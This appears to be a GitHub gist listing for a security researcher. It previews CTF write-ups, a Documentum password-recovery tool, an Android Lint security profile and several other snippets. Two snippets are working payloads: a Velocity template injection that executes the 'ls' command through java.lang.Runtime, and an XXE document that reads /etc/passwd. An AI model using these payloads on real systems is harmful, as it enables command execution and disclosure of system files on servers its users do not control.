Skip to content

Instantly share code, notes, and snippets.

View h3xstream's full-sized avatar

Philippe Arteau h3xstream

501 followers · 42 following
View GitHub Profile
@h3xstream
h3xstream / bh2014_nike.py
Created August 11, 2014 20:42
Black Hat 2014: Nike T-shirt
from binascii import hexlify,unhexlify
data = int('0b01001010 01110101 01110011 01110100 00100000 01000100 01101111 00100000 01001001 01110100'.replace(" ",""),2)
print unhexlify("%x" % data)
@h3xstream
h3xstream / web300.md
Last active August 13, 2018 08:34
GoSecure CTF - Web 300 pts writeup

Starting at the URL http://web300.gosec.net:6473/, we can see a page serving a static image /troll.jpg. No special parameter can be found. The image is confirm to be static. Some stegano test were done on the image but nothing special is observe.

troll page

Hidden admin page

We scan the host for hidden files and directories using tachyon. The tool found the existence of /admin.php.

login page

@h3xstream
h3xstream / web200.md
Last active November 8, 2023 20:48
GoSecure CTF - Web 200 pts writeup

Starting at the URL http://web200.gosec.net:7721, we can see a login page for a dating site.

login

Small oracle

It is possible to identify that the user admin exists because we get two distinct error messages.

Invalid user:

@h3xstream
h3xstream / RecoverPW.java
Last active March 14, 2021 15:52
Decrypt Documentum database passwords.
/*
* (C) 2012 MSRoth - msroth.wordpress.com
*
* recoverPW v2
*
* This code will decrypt BOF and database passwords. It will *NOT* decrypt
* inline user passwords.
*
* From the D6.5 EMC Documentum Content Server Administration Guide, p. 353:
* "Passwords encrypted with encryptPassword cannot be decrypted explicitly
@h3xstream
h3xstream / Android_Security.xml
Created June 29, 2015 18:07
Security profile for Android Lint (for Security Audit)
<?xml version="1.0" encoding="UTF-8"?>
<inspections version="1.0" is_locked="false">
<option name="myName" value="Android Lint - Security only checks" />
<option name="myLocal" value="false" />
<inspection_tool class="AccessStaticViaInstance" enabled="false" level="WARNING" enabled_by_default="false" />
<inspection_tool class="AndroidDomInspection" enabled="false" level="ERROR" enabled_by_default="false" />
<inspection_tool class="AndroidElementNotAllowed" enabled="false" level="WARNING" enabled_by_default="false" />
<inspection_tool class="AndroidLintAaptCrash" enabled="false" level="ERROR" enabled_by_default="false" />
<inspection_tool class="AndroidLintAccidentalOctal" enabled="false" level="ERROR" enabled_by_default="false" />
<inspection_tool class="AndroidLintAdapterViewChildren" enabled="false" level="WARNING" enabled_by_default="false" />
@h3xstream
h3xstream / >> output result
Last active September 3, 2015 20:27
Type erasure
> javac *.java
> javap -c StringBuilderProcessor
Compiled from "StringBuilderProcessor.java"
public class StringBuilderProcessor implements GenericProcessor<java.lang.StringBuilder> {
public StringBuilderProcessor();
Code:
0: aload_0
1: invokespecial #1 // Method java/lang/Object."<init>":()V
4: return
@h3xstream
h3xstream / liens.md
Last active August 7, 2017 18:05
GoSecure - PFE Analyse statique
@h3xstream
h3xstream / links.md
Last active August 7, 2017 18:05
YMCA links - Pool
@h3xstream
h3xstream / rce.vm
Last active June 6, 2017 03:00
RCE in velocity template when no extension enable
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('ls'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
@h3xstream
h3xstream / etc-passwd
Last active October 27, 2018 15:00
44con
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<feed>
<title>test</title>
<description>test</description>